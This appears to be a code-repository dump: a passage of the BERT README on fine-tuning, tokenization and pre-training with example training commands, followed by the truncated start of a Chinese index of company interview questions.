specifies the hyperparameters of the model. ## Fine-tuning with BERT **Important**: All results on the paper were fine-tuned on a single Cloud TPU, which has 64GB of RAM. It is currently not possible to re-produce most of the `BERT-Large` results on the paper using a GPU with 12GB - 16GB of RAM, because the maximum batch size that can fit in memory is too small. We are working on adding code to this repository which allows for much larger effective batch size on the GPU. See the section on [out-of-memory issues](#out-of-memory-issues) for more details. This code was tested with TensorFlow 1.11.0. It was tested with Python2 and Python3 (but more thoroughly with Python2, since this is what's used internally in Google). The fine-tuning examples which use `BERT-Base` should be able to run on a GPU that has at least 12GB of RAM using the hyperparameters given. ### Fine-tuning with Cloud TPUs Most of the examples below assumes that you will be running training/evaluation on your local machine, using a GPU like a Titan X or GTX 1080. However, if you have access to a Cloud TPU that you want to train on, just add the following flags to `run_classifier.py` or `run_squad.py`: ``` --use_tpu=True \ --tpu_name=$TPU_NAME ``` Please see the [Google Cloud TPU tutorial](https://cloud.google.com/tpu/docs/tutorials/mnist) for how to use Cloud TPUs. Alternatively, you can use the Google Colab notebook "[BERT FineTuning with Cloud TPUs](https://colab.research.google.com/github/tensorflow/tpu/blob/master/tools/colab/bert_finetuning_with_cloud_tpus.ipynb)". 
On Cloud TPUs, the pretrained model and the output directory will need to be on
Google Cloud Storage. For example, if you have a bucket named `some_bucket`, you
might use the following flags instead:

```
  --output_dir=gs://some_bucket/my_output_dir/
```

The unzipped pre-trained model files can also be found in the Google Cloud
Storage folder `gs://bert_models/2018_10_18`. For example:

```
export BERT_BASE_DIR=gs://bert_models/2018_10_18/uncased_L-12_H-768_A-12
```

### Sentence (and sentence-pair) classification tasks

Before running this example you must download the
[GLUE data](https://gluebenchmark.com/tasks) by running
[this script](https://gist.github.com/W4ngatang/60c2bdb54d156a41194446737ce03e2e)
and unpack it to some directory `$GLUE_DIR`. Next, download the `BERT-Base`
checkpoint and unzip it to some directory `$BERT_BASE_DIR`.

This example code fine-tunes `BERT-Base` on the Microsoft Research Paraphrase
Corpus (MRPC), which only contains 3,600 examples and can fine-tune in a few
minutes on most GPUs.

```shell
export BERT_BASE_DIR=/path/to/bert/uncased_L-12_H-768_A-12
export GLUE_DIR=/path/to/glue

python run_classifier.py \
  --task_name=MRPC \
  --do_train=true \
  --do_eval=true \
  --data_dir=$GLUE_DIR/MRPC \
  --vocab_file=$BERT_BASE_DIR/vocab.txt \
  --bert_config_file=$BERT_BASE_DIR/bert_config.json \
  --init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \
  --max_seq_length=128 \
  --train_batch_size=32 \
  --learning_rate=2e-5 \
  --num_train_epochs=3.0 \
  --output_dir=/tmp/mrpc_output/
```

You should see output like this:

```
***** Eval results *****
  eval_accuracy = 0.845588
  eval_loss = 0.505248
  global_step = 343
  loss = 0.505248
```

This means that the Dev set accuracy was 84.55%. Small sets like MRPC have a
high variance in the Dev set accuracy, even when starting from the same
pre-training checkpoint. If you re-run multiple times (making sure to point to
different `output_dir`), you should see results between 84% and 88%.

A few other pre-trained models are implemented off-the-shelf in
`run_classifier.py`, so it should be straightforward to follow those examples to
use BERT for any single-sentence or sentence-pair classification task.

Note: You might see a message `Running train on CPU`. This really just means
that it's running on something other than a Cloud TPU, which includes a GPU.

#### Prediction from classifier

Once you have trained your classifier, you can use it in inference mode by
passing `--do_predict=true`. You need to have a file named `test.tsv` in the
input folder. Output will be created in a file called `test_results.tsv` in the
output folder. Each line will contain the output for one sample, and the columns
are the class probabilities.

```shell
export BERT_BASE_DIR=/path/to/bert/uncased_L-12_H-768_A-12
export GLUE_DIR=/path/to/glue
export TRAINED_CLASSIFIER=/path/to/fine/tuned/classifier

python run_classifier.py \
  --task_name=MRPC \
  --do_predict=true \
  --data_dir=$GLUE_DIR/MRPC \
  --vocab_file=$BERT_BASE_DIR/vocab.txt \
  --bert_config_file=$BERT_BASE_DIR/bert_config.json \
  --init_checkpoint=$TRAINED_CLASSIFIER \
  --max_seq_length=128 \
  --output_dir=/tmp/mrpc_output/
```

### SQuAD 1.1

The Stanford Question Answering Dataset (SQuAD) is a popular question answering
benchmark dataset. BERT (at the time of the release) obtains state-of-the-art
results on SQuAD with almost no task-specific network architecture modifications
or data augmentation.
However, it does require semi-complex data pre-processing and post-processing to deal with (a) the variable-length nature of SQuAD context paragraphs, and (b) the character-level answer annotations which are used for SQuAD training. This processing is implemented and documented in `run_squad.py`. To run on SQuAD, you will first need to download the dataset. The [SQuAD website](https://rajpurkar.github.io/SQuAD-explorer/) does not seem to link to the v1.1 datasets any longer, but the necessary files can be found here: * [train-v1.1.json](https://rajpurkar.github.io/SQuAD-explorer/dataset/train-v1.1.json) * [dev-v1.1.json](https://rajpurkar.github.io/SQuAD-explorer/dataset/dev-v1.1.json) * [evaluate-v1.1.py](https://github.com/allenai/bi-att-flow/blob/master/squad/evaluate-v1.1.py) Download these to some directory `$SQUAD_DIR`. The state-of-the-art SQuAD results from the paper currently cannot be reproduced on a 12GB-16GB GPU due to memory constraints (in fact, even batch size 1 does not seem to fit on a 12GB GPU using `BERT-Large`). However, a reasonably strong `BERT-Base` model can be trained on the GPU with these hyperparameters: ```shell python run_squad.py \ --vocab_file=$BERT_BASE_DIR/vocab.txt \ --bert_config_file=$BERT_BASE_DIR/bert_config.json \ --init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \ --do_train=True \ --train_file=$SQUAD_DIR/train-v1.1.json \ --do_predict=True \ --predict_file=$SQUAD_DIR/dev-v1.1.json \ --train_batch_size=12 \ --learning_rate=3e-5 \ --num_train_epochs=2.0 \ --max_seq_length=384 \ --doc_stride=128 \ --output_dir=/tmp/squad_base/ ``` The dev set predictions will be saved into a file called `predictions.json` in the `output_dir`: ```shell python $SQUAD_DIR/evaluate-v1.1.py $SQUAD_DIR/dev-v1.1.json ./squad/predictions.json ``` Which should produce an output like this: ```shell {"f1": 88.41249612335034, "exact_match": 81.2488174077578} ``` You should see a result similar to the 88.5% reported in the paper for `BERT-Base`. If you have access to a Cloud TPU, you can train with `BERT-Large`. Here is a set of hyperparameters (slightly different than the paper) which consistently obtain around 90.5%-91.0% F1 single-system trained only on SQuAD: ```shell python run_squad.py \ --vocab_file=$BERT_LARGE_DIR/vocab.txt \ --bert_config_file=$BERT_LARGE_DIR/bert_config.json \ --init_checkpoint=$BERT_LARGE_DIR/bert_model.ckpt \ --do_train=True \ --train_file=$SQUAD_DIR/train-v1.1.json \ --do_predict=True \ --predict_file=$SQUAD_DIR/dev-v1.1.json \ --train_batch_size=24 \ --learning_rate=3e-5 \ --num_train_epochs=2.0 \ --max_seq_length=384 \ --doc_stride=128 \ --output_dir=gs://some_bucket/squad_large/ \ --use_tpu=True \ --tpu_name=$TPU_NAME ``` For example, one random run with these parameters produces the following Dev scores: ```shell {"f1": 90.87081895814865, "exact_match": 84.38978240302744} ``` If you fine-tune for one epoch on [TriviaQA](http://nlp.cs.washington.edu/triviaqa/) before this the results will be even better, but you will need to convert TriviaQA into the SQuAD json format. ### SQuAD 2.0 This model is also implemented and documented in `run_squad.py`. To run on SQuAD 2.0, you will first need to download the dataset. 
The necessary files can be found here:

*   [train-v2.0.json](https://rajpurkar.github.io/SQuAD-explorer/dataset/train-v2.0.json)
*   [dev-v2.0.json](https://rajpurkar.github.io/SQuAD-explorer/dataset/dev-v2.0.json)
*   [evaluate-v2.0.py](https://worksheets.codalab.org/rest/bundles/0x6b567e1cf2e041ec80d7098f031c5c9e/contents/blob/)

Download these to some directory `$SQUAD_DIR`.

On Cloud TPU you can run with BERT-Large as follows:

```shell
python run_squad.py \
  --vocab_file=$BERT_LARGE_DIR/vocab.txt \
  --bert_config_file=$BERT_LARGE_DIR/bert_config.json \
  --init_checkpoint=$BERT_LARGE_DIR/bert_model.ckpt \
  --do_train=True \
  --train_file=$SQUAD_DIR/train-v2.0.json \
  --do_predict=True \
  --predict_file=$SQUAD_DIR/dev-v2.0.json \
  --train_batch_size=24 \
  --learning_rate=3e-5 \
  --num_train_epochs=2.0 \
  --max_seq_length=384 \
  --doc_stride=128 \
  --output_dir=gs://some_bucket/squad_large/ \
  --use_tpu=True \
  --tpu_name=$TPU_NAME \
  --version_2_with_negative=True
```

We assume you have copied everything from the output directory to a local
directory called `./squad/`. The initial dev set predictions will be at
`./squad/predictions.json`, and the differences between the score of no answer
("") and the best non-null answer for each question will be in the file
`./squad/null_odds.json`.

Run this script to tune a threshold for predicting null versus non-null
answers:

`python $SQUAD_DIR/evaluate-v2.0.py $SQUAD_DIR/dev-v2.0.json ./squad/predictions.json --na-prob-file ./squad/null_odds.json`

Assume the script outputs `best_f1_thresh` THRESH (typical values are between
-1.0 and -5.0). You can now re-run the model to generate predictions with the
derived threshold, or alternatively you can extract the appropriate answers from
`./squad/nbest_predictions.json`.

```shell
python run_squad.py \
  --vocab_file=$BERT_LARGE_DIR/vocab.txt \
  --bert_config_file=$BERT_LARGE_DIR/bert_config.json \
  --init_checkpoint=$BERT_LARGE_DIR/bert_model.ckpt \
  --do_train=False \
  --train_file=$SQUAD_DIR/train-v2.0.json \
  --do_predict=True \
  --predict_file=$SQUAD_DIR/dev-v2.0.json \
  --train_batch_size=24 \
  --learning_rate=3e-5 \
  --num_train_epochs=2.0 \
  --max_seq_length=384 \
  --doc_stride=128 \
  --output_dir=gs://some_bucket/squad_large/ \
  --use_tpu=True \
  --tpu_name=$TPU_NAME \
  --version_2_with_negative=True \
  --null_score_diff_threshold=$THRESH
```

### Out-of-memory issues

All experiments in the paper were fine-tuned on a Cloud TPU, which has 64GB of
device RAM. Therefore, when using a GPU with 12GB - 16GB of RAM, you are likely
to encounter out-of-memory issues if you use the same hyperparameters described
in the paper.

The factors that affect memory usage are:

*   **`max_seq_length`**: The released models were trained with sequence
    lengths up to 512, but you can fine-tune with a shorter max sequence length
    to save substantial memory. This is controlled by the `max_seq_length` flag
    in our example code (see the example invocation after this list).

*   **`train_batch_size`**: The memory usage is also directly proportional to
    the batch size.

*   **Model type, `BERT-Base` vs. `BERT-Large`**: The `BERT-Large` model
    requires significantly more memory than `BERT-Base`.

*   **Optimizer**: The default optimizer for BERT is Adam, which requires a lot
    of extra memory to store the `m` and `v` vectors. Switching to a more
    memory-efficient optimizer can reduce memory usage, but can also affect the
    results. We have not experimented with other optimizers for fine-tuning.
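In practice, the first two factors are the easiest to control: lowering
`max_seq_length` and/or `train_batch_size` is usually enough to fit `BERT-Base`
fine-tuning into 12GB of GPU RAM. As a rough illustration (the specific values
below are arbitrary, chosen only to show which flags to change, not tuned
hyperparameters), the MRPC command from earlier could be run as:

```shell
# Illustrative only: a smaller max_seq_length and train_batch_size reduce
# memory use at some cost in accuracy. All other flags are unchanged from the
# MRPC example above.
python run_classifier.py \
  --task_name=MRPC \
  --do_train=true \
  --do_eval=true \
  --data_dir=$GLUE_DIR/MRPC \
  --vocab_file=$BERT_BASE_DIR/vocab.txt \
  --bert_config_file=$BERT_BASE_DIR/bert_config.json \
  --init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \
  --max_seq_length=64 \
  --train_batch_size=8 \
  --learning_rate=2e-5 \
  --num_train_epochs=3.0 \
  --output_dir=/tmp/mrpc_output_small/
```

The benchmark table below gives a sense of how far these two flags can be
pushed on a 12GB GPU.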
Using the default training scripts (`run_classifier.py` and `run_squad.py`), we
benchmarked the maximum batch size on a single Titan X GPU (12GB RAM) with
TensorFlow 1.11.0:

System       | Seq Length | Max Batch Size
------------ | ---------- | --------------
`BERT-Base`  | 64         | 64
...          | 128        | 32
...          | 256        | 16
...          | 320        | 14
...          | 384        | 12
...          | 512        | 6
`BERT-Large` | 64         | 12
...          | 128        | 6
...          | 256        | 2
...          | 320        | 1
...          | 384        | 0
...          | 512        | 0

Unfortunately, these max batch sizes for `BERT-Large` are so small that they
will actually harm the model accuracy, regardless of the learning rate used. We
are working on adding code to this repository which will allow much larger
effective batch sizes to be used on the GPU. The code will be based on one (or
both) of the following techniques:

*   **Gradient accumulation**: The samples in a minibatch are typically
    independent with respect to gradient computation (excluding batch
    normalization, which is not used here). This means that the gradients of
    multiple smaller minibatches can be accumulated before performing the
    weight update, and this will be exactly equivalent to a single larger
    update.

*   [**Gradient checkpointing**](https://github.com/openai/gradient-checkpointing):
    The major use of GPU/TPU memory during DNN training is caching the
    intermediate activations in the forward pass that are necessary for
    efficient computation in the backward pass. "Gradient checkpointing" trades
    memory for compute time by re-computing the activations in an intelligent
    way.

**However, this is not implemented in the current release.**

## Using BERT to extract fixed feature vectors (like ELMo)

In certain cases, rather than fine-tuning the entire pre-trained model
end-to-end, it can be beneficial to obtain *pre-trained contextual embeddings*,
which are fixed contextual representations of each input token generated from
the hidden layers of the pre-trained model. This should also mitigate most of
the out-of-memory issues.

As an example, we include the script `extract_features.py` which can be used
like this:

```shell
# Sentence A and Sentence B are separated by the ||| delimiter for sentence
# pair tasks like question answering and entailment.
# For single sentence inputs, put one sentence per line and DON'T use the
# delimiter.
echo 'Who was Jim Henson ? ||| Jim Henson was a puppeteer' > /tmp/input.txt

python extract_features.py \
  --input_file=/tmp/input.txt \
  --output_file=/tmp/output.jsonl \
  --vocab_file=$BERT_BASE_DIR/vocab.txt \
  --bert_config_file=$BERT_BASE_DIR/bert_config.json \
  --init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \
  --layers=-1,-2,-3,-4 \
  --max_seq_length=128 \
  --batch_size=8
```

This will create a JSON file (one line per line of input) containing the BERT
activations from each Transformer layer specified by `layers` (-1 is the final
hidden layer of the Transformer, etc.); a short sketch of how to read this file
back is shown at the end of this section.

Note that this script will produce very large output files (by default, around
15kb for every input token).

If you need to maintain alignment between the original and tokenized words (for
projecting training labels), see the [Tokenization](#tokenization) section
below.

**Note:** You may see a message like `Could not find trained model in
model_dir: /tmp/tmpuB5g5c, running initialization to predict.` This message is
expected; it just means that we are using the `init_from_checkpoint()` API
rather than the saved model API. If you don't specify a checkpoint or specify an
invalid checkpoint, this script will complain.
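For convenience, here is a minimal sketch of how the resulting JSON Lines file
could be read back in Python. The field names used below (`features`, `token`,
`layers`, `values`) are an assumption based on one version of the script's
output, so check them against your own `/tmp/output.jsonl` before relying on
them:

```python
import json

# A minimal, hedged sketch for inspecting the output of extract_features.py.
# The field names below are assumptions; verify them against your output file.
with open("/tmp/output.jsonl", "r") as reader:
    for line in reader:
        example = json.loads(line)
        for feature in example["features"]:
            token = feature["token"]
            # Each entry in "layers" corresponds to one of the indices passed
            # via --layers (the first entry here would be layer -1).
            top_layer_values = feature["layers"][0]["values"]
            print(token, len(top_layer_values))  # 768 dimensions for BERT-Base
```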
## Tokenization For sentence-level tasks (or sentence-pair) tasks, tokenization is very simple. Just follow the example code in `run_classifier.py` and `extract_features.py`. The basic procedure for sentence-level tasks is: 1. Instantiate an instance of `tokenizer = tokenization.FullTokenizer` 2. Tokenize the raw text with `tokens = tokenizer.tokenize(raw_text)`. 3. Truncate to the maximum sequence length. (You can use up to 512, but you probably want to use shorter if possible for memory and speed reasons.) 4. Add the `[CLS]` and `[SEP]` tokens in the right place. Word-level and span-level tasks (e.g., SQuAD and NER) are more complex, since you need to maintain alignment between your input text and output text so that you can project your training labels. SQuAD is a particularly complex example because the input labels are *character*-based, and SQuAD paragraphs are often longer than our maximum sequence length. See the code in `run_squad.py` to show how we handle this. Before we describe the general recipe for handling word-level tasks, it's important to understand what exactly our tokenizer is doing. It has three main steps: 1. **Text normalization**: Convert all whitespace characters to spaces, and (for the `Uncased` model) lowercase the input and strip out accent markers. E.g., `John Johanson's, → john johanson's,`. 2. **Punctuation splitting**: Split *all* punctuation characters on both sides (i.e., add whitespace around all punctuation characters). Punctuation characters are defined as (a) Anything with a `P*` Unicode class, (b) any non-letter/number/space ASCII character (e.g., characters like `$` which are technically not punctuation). E.g., `john johanson's, → john johanson ' s ,` 3. **WordPiece tokenization**: Apply whitespace tokenization to the output of the above procedure, and apply [WordPiece](https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/data_generators/text_encoder.py) tokenization to each token separately. (Our implementation is directly based on the one from `tensor2tensor`, which is linked). E.g., `john johanson ' s , → john johan ##son ' s ,` The advantage of this scheme is that it is "compatible" with most existing English tokenizers. For example, imagine that you have a part-of-speech tagging task which looks like this: ``` Input: John Johanson 's house Labels: NNP NNP POS NN ``` The tokenized output will look like this: ``` Tokens: john johan ##son ' s house ``` Crucially, this would be the same output as if the raw text were `John Johanson's house` (with no space before the `'s`). If you have a pre-tokenized representation with word-level annotations, you can simply tokenize each input word independently, and deterministically maintain an original-to-tokenized alignment: ```python ### Input orig_tokens = ["John", "Johanson", "'s", "house"] labels = ["NNP", "NNP", "POS", "NN"] ### Output bert_tokens = [] # Token map will be an int -> int mapping between the `orig_tokens` index and # the `bert_tokens` index. orig_to_tok_map = [] tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=True) bert_tokens.append("[CLS]") for orig_token in orig_tokens: orig_to_tok_map.append(len(bert_tokens)) bert_tokens.extend(tokenizer.tokenize(orig_token)) bert_tokens.append("[SEP]") # bert_tokens == ["[CLS]", "john", "johan", "##son", "'", "s", "house", "[SEP]"] # orig_to_tok_map == [1, 2, 4, 6] ``` Now `orig_to_tok_map` can be used to project `labels` to the tokenized representation. 
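As a concrete illustration of that projection, below is a hedged sketch of one
common convention: copy each word-level label onto the first WordPiece of the
corresponding word and give every other position a dummy label. This is only
one possible scheme (not something prescribed by this repository), and the
names `bert_labels` and the placeholder label `"X"` are invented for the
example:

```python
# Continuing the example above (values repeated here so the snippet runs on
# its own).
labels = ["NNP", "NNP", "POS", "NN"]
bert_tokens = ["[CLS]", "john", "johan", "##son", "'", "s", "house", "[SEP]"]
orig_to_tok_map = [1, 2, 4, 6]

# Project word-level labels onto WordPieces by labeling only the first
# sub-token of each word. "X" is an arbitrary placeholder for positions that
# carry no label ([CLS], [SEP], and word continuations).
bert_labels = ["X"] * len(bert_tokens)
for orig_index, bert_index in enumerate(orig_to_tok_map):
    bert_labels[bert_index] = labels[orig_index]

print(bert_labels)
# ["X", "NNP", "NNP", "X", "POS", "X", "NN", "X"]
```

Labeling only the first WordPiece keeps the label sequence aligned with
`bert_tokens`, so the dummy positions can simply be masked out of the loss or
ignored when reading predictions back at the word level.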
There are common English tokenization schemes which will cause a slight
mismatch between how your text is tokenized and how BERT was pre-trained. For
example, if your input tokenization splits off contractions like `do n't`, this
will cause a mismatch. If it is possible to do so, you should pre-process your
data to convert these back to raw-looking text, but if it's not possible, this
mismatch is likely not a big deal.

## Pre-training with BERT

We are releasing code to do "masked LM" and "next sentence prediction" on an
arbitrary text corpus. Note that this is *not* the exact code that was used for
the paper (the original code was written in C++, and had some additional
complexity), but this code does generate pre-training data as described in the
paper.

Here's how to run the data generation. The input is a plain text file, with one
sentence per line. (It is important that these be actual sentences for the
"next sentence prediction" task.) Documents are delimited by empty lines. The
output is a set of `tf.train.Example`s serialized into `TFRecord` file format.

You can perform sentence segmentation with an off-the-shelf NLP toolkit such as
[spaCy](https://spacy.io/). The `create_pretraining_data.py` script will
concatenate segments until they reach the maximum sequence length to minimize
computational waste from padding (see the script for more details). However,
you may want to intentionally add a slight amount of noise to your input data
(e.g., randomly truncate 2% of input segments) to make it more robust to
non-sentential input during fine-tuning.

This script stores all of the examples for the entire input file in memory, so
for large data files you should shard the input file and call the script
multiple times. (You can pass in a file glob to `run_pretraining.py`, e.g.,
`tf_examples.tf_record*`.)

The `max_predictions_per_seq` is the maximum number of masked LM predictions
per sequence. You should set this to around `max_seq_length` * `masked_lm_prob`
(the script doesn't do that automatically because the exact value needs to be
passed to both scripts).

```shell
python create_pretraining_data.py \
  --input_file=./sample_text.txt \
  --output_file=/tmp/tf_examples.tfrecord \
  --vocab_file=$BERT_BASE_DIR/vocab.txt \
  --do_lower_case=True \
  --max_seq_length=128 \
  --max_predictions_per_seq=20 \
  --masked_lm_prob=0.15 \
  --random_seed=12345 \
  --dupe_factor=5
```

Here's how to run the pre-training. Do not include `init_checkpoint` if you are
pre-training from scratch. The model configuration (including vocab size) is
specified in `bert_config_file`. This demo code only pre-trains for a small
number of steps (20), but in practice you will probably want to set
`num_train_steps` to 10000 steps or more. The `max_seq_length` and
`max_predictions_per_seq` parameters passed to `run_pretraining.py` must be the
same as the values passed to `create_pretraining_data.py`.
```shell python run_pretraining.py \ --input_file=/tmp/tf_examples.tfrecord \ --output_dir=/tmp/pretraining_output \ --do_train=True \ --do_eval=True \ --bert_config_file=$BERT_BASE_DIR/bert_config.json \ --init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \ --train_batch_size=32 \ --max_seq_length=128 \ --max_predictions_per_seq=20 \ --num_train_steps=20 \ --num_warmup_steps=10 \ --learning_rate=2e-5 ``` This will produce an output like this: ``` ***** Eval results ***** global_step = 20 loss = 0.0979674 masked_lm_accuracy = 0.985479 masked_lm_loss = 0.0979328 next_sentence_accuracy = 1.0 next_sentence_loss = 3.45724e-05 ``` Note that since our `sample_text.txt` file is very small, this example training will overfit that data in only a few steps and produce unrealistically high accuracy numbers. ### Pre-training tips and caveats * **If using your own vocabulary, make sure to change `vocab_size` in `bert_config.json`. If you use a larger vocabulary without changing this, you will likely get NaNs when training on GPU or TPU due to unchecked out-of-bounds access.** * If your task has a large domain-specific corpus available (e.g., "movie reviews" or "scientific papers"), it will likely be beneficial to run additional steps of pre-training on your corpus, starting from the BERT checkpoint. * The learning rate we used in the paper was 1e-4. However, if you are doing additional steps of pre-training starting from an existing BERT checkpoint, you should use a smaller learning rate (e.g., 2e-5). * Current BERT models are English-only, but we do plan to release a multilingual model which has been pre-trained on a lot of languages in the near future (hopefully by the end of November 2018). * Longer sequences are disproportionately expensive because attention is quadratic to the sequence length. In other words, a batch of 64 sequences of length 512 is much more expensive than a batch of 256 sequences of length 128. The fully-connected/convolutional cost is the same, but the attention cost is far greater for the 512-length sequences. Therefore, one good recipe is to pre-train for, say, 90,000 steps with a sequence length of 128 and then for 10,000 additional steps with a sequence length of 512. The very long sequences are mostly needed to learn positional embeddings, which can be learned fairly quickly. Note that this does require generating the data twice with different values of `max_seq_length`. * If you are pre-training from scratch, be prepared that pre-training is computationally expensive, especially on GPUs. If you are pre-training from scratch, our recommended recipe is to pre-train a `BERT-Base` on a single [preemptible Cloud TPU v2](https://cloud.google.com/tpu/docs/pricing), which takes about 2 weeks at a cost of about $500 USD (based on the pricing in October 2018). You will have to scale down the batch size when only training on a single Cloud TPU, compared to what was used in the paper. It is recommended to use the largest batch size that fits into TPU memory. ### Pre-training data We will **not** be able to release the pre-processed datasets used in the paper. For Wikipedia, the recommended pre-processing is to download [the latest dump](https://dumps.wikimedia.org/enwiki/latest/enwiki-latest-pages-articles.xml.bz2), extract the text with [`WikiExtractor.py`](https://github.com/attardi/wikiextractor), and then apply any necessary cleanup to convert it into plain text. 
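To make that Wikipedia recipe concrete, here is a rough sketch of the steps.
The exact `WikiExtractor.py` invocation and flags differ between versions of
that tool, so treat this as an outline under those assumptions rather than an
exact recipe:

```shell
# Rough outline only; WikiExtractor.py flags differ between versions.
wget https://dumps.wikimedia.org/enwiki/latest/enwiki-latest-pages-articles.xml.bz2
python WikiExtractor.py enwiki-latest-pages-articles.xml.bz2 -o extracted_wiki

# Then post-process the extracted text into the plain-text format expected by
# create_pretraining_data.py: one sentence per line, with blank lines between
# documents (a sentence splitter such as spaCy can be used for this step).
```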
Unfortunately the researchers who collected the
[BookCorpus](http://yknzhu.wixsite.com/mbweb) no longer have it available for
public download. The
[Project Gutenberg Dataset](https://web.eecs.umich.edu/~lahiri/gutenberg_dataset.html)
is a somewhat smaller (200M word) collection of older books that are public
domain.

[Common Crawl](http://commoncrawl.org/) is another very large collection of
text, but you will likely have to do substantial pre-processing and cleanup to
extract a usable corpus for pre-training BERT.

### Learning a new WordPiece vocabulary

This repository does not include code for *learning* a new WordPiece
vocabulary. The reason is that the code used in the paper was implemented in
C++ with dependencies on Google's internal libraries. For English, it is almost
always better to just start with our vocabulary and pre-trained models. For
learning vocabularies of other languages, there are a number of open source
options available. However, keep in mind that these are not compatible with our
`tokenization.py` library:

*   [Google's SentencePiece library](https://github.com/google/sentencepiece)

*   [tensor2tensor's WordPiece generation script](https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/data_generators/text_encoder_build_subword.py)

*   [Rico Sennrich's Byte Pair Encoding library](https://github.com/rsennrich/subword-nmt)

## Using BERT in Colab

If you want to use BERT with [Colab](https://colab.research.google.com), you
can get started with the notebook
"[BERT FineTuning with Cloud TPUs](https://colab.research.google.com/github/tensorflow/tpu/blob/master/tools/colab/bert_finetuning_with_cloud_tpus.ipynb)".
**At the time of this writing (October 31st, 2018), Colab users can access a
Cloud TPU completely for free.** Note: One per user, availability limited,
requires a Google Cloud Platform account with storage (although storage may be
purchased with free credit for signing up with GCP), and this capability may no
longer be available in the future. Click on the BERT Colab that was just linked
for more information.

## FAQ

#### Is this code compatible with Cloud TPUs? What about GPUs?

Yes, all of the code in this repository works out-of-the-box with CPU, GPU, and
Cloud TPU. However, GPU training is single-GPU only.

#### I am getting out-of-memory errors, what is wrong?

See the section on [out-of-memory issues](#out-of-memory-issues) for more
information.

#### Is there a PyTorch version available?

There is no official PyTorch implementation. However, NLP researchers from
HuggingFace made a
[PyTorch version of BERT available](https://github.com/huggingface/pytorch-pretrained-BERT)
which is compatible with our pre-trained checkpoints and is able to reproduce
our results. We were not involved in the creation or maintenance of the PyTorch
implementation so please direct any questions towards the authors of that
repository.

#### Is there a Chainer version available?

There is no official Chainer implementation. However, Sosuke Kobayashi made a
[Chainer version of BERT available](https://github.com/soskek/bert-chainer)
which is compatible with our pre-trained checkpoints and is able to reproduce
our results. We were not involved in the creation or maintenance of the Chainer
implementation so please direct any questions towards the authors of that
repository.

#### Will models in other languages be released?

Yes, we plan to release a multi-lingual BERT model in the near future.
We cannot make promises about exactly which languages will be included, but it will likely be a single model which includes *most* of the languages which have a significantly-sized Wikipedia. #### Will models larger than `BERT-Large` be released? So far we have not attempted to train anything larger than `BERT-Large`. It is possible that we will release larger models if we are able to obtain significant improvements. #### What license is this library released under? All code *and* models are released under the Apache 2.0 license. See the `LICENSE` file for more information. #### How do I cite BERT? For now, cite [the Arxiv paper](https://arxiv.org/abs/1810.04805): ``` @article{devlin2018bert, title={BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding}, author={Devlin, Jacob and Chang, Ming-Wei and Lee, Kenton and Toutanova, Kristina}, journal={arXiv preprint arXiv:1810.04805}, year={2018} } ``` If we submit the paper to a conference or journal, we will update the BibTeX. ## Disclaimer This is not an official Google product. ## Contact information For help or issues using BERT, please submit a GitHub issue. For personal communication related to BERT, please contact Jacob Devlin (`[email protected]`), Ming-Wei Chang (`[email protected]`), or Kenton Lee (`[email protected]`).
interview_internal_reference
9fe6c758e98c03c40c8908c39e78ab98a7ab53d6
## 2023年最新总结,阿里,腾讯,百度,美团,头条等技术面试题目,以及答案,专家出题人分析汇总。持续更新中。 * [阿里篇](#1) * [华为篇](#2) * [百度篇](#3) * [腾讯篇](#4) * [美团篇](#5) * [头条篇](#6) * [滴滴篇](#7) * [京东篇](#8) * [MySQL篇](#9) * [Redis篇](#10) * [MongoDB篇](#11) * [Zookeeper篇](#12) * [Nginx篇](#13) * [算法篇](#14) * [内存篇](#15) * [cpu篇](#16) * [磁盘篇](#17) * [网络通信篇](#18) * [安全篇](#19) * [并发篇](#20) <h3 id="1">阿里篇</h3> --- ##### [1.1.1 如何实现一个高效的单向链表逆序输出?](01.阿里篇/1.1.1%20%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E4%B8%80%E4%B8%AA%E9%AB%98%E6%95%88%E7%9A%84%E5%8D%95%E5%90%91%E9%93%BE%E8%A1%A8%E9%80%86%E5%BA%8F%E8%BE%93%E5%87%BA%EF%BC%9F.md) ##### [1.1.2 已知sqrt(2)约等于1.414,要求不用数学库,求sqrt(2)精确到小数点后10位](01.阿里篇/1.1.2%20%E5%B7%B2%E7%9F%A5sqrt%282%29%E7%BA%A6%E7%AD%89%E4%BA%8E1.414%EF%BC%8C%E8%A6%81%E6%B1%82%E4%B8%8D%E7%94%A8%E6%95%B0%E5%AD%A6%E5%BA%93%EF%BC%8C%E6%B1%82sqrt%282%29%E7%B2%BE%E7%A1%AE%E5%88%B0%E5%B0%8F%E6%95%B0%E7%82%B9%E5%90%8E10%E4%BD%8D.md) ##### [1.1.3 给定一个二叉搜索树(BST),找到树中第 K 小的节点](01.阿里篇/1.1.3%20%E7%BB%99%E5%AE%9A%E4%B8%80%E4%B8%AA%E4%BA%8C%E5%8F%89%E6%90%9C%E7%B4%A2%E6%A0%91%28BST%29%EF%BC%8C%E6%89%BE%E5%88%B0%E6%A0%91%E4%B8%AD%E7%AC%AC%20K%20%E5%B0%8F%E7%9A%84%E8%8A%82%E7%82%B9.md) ##### [1.1.4 LRU缓存机制](01.阿里篇/1.1.4%20LRU%E7%BC%93%E5%AD%98%E6%9C%BA%E5%88%B6.md) ##### [1.1.5 关于epoll和select的区别,以下哪些说法是正确的](01.阿里篇/1.1.5%20%E5%85%B3%E4%BA%8Eepoll%E5%92%8Cselect%E7%9A%84%E5%8C%BA%E5%88%AB%EF%BC%8C%E4%BB%A5%E4%B8%8B%E5%93%AA%E4%BA%9B%E8%AF%B4%E6%B3%95%E6%98%AF%E6%AD%A3%E7%A1%AE%E7%9A%84.md) ##### [1.1.6 从innodb的索引结构分析,为什么索引的 key 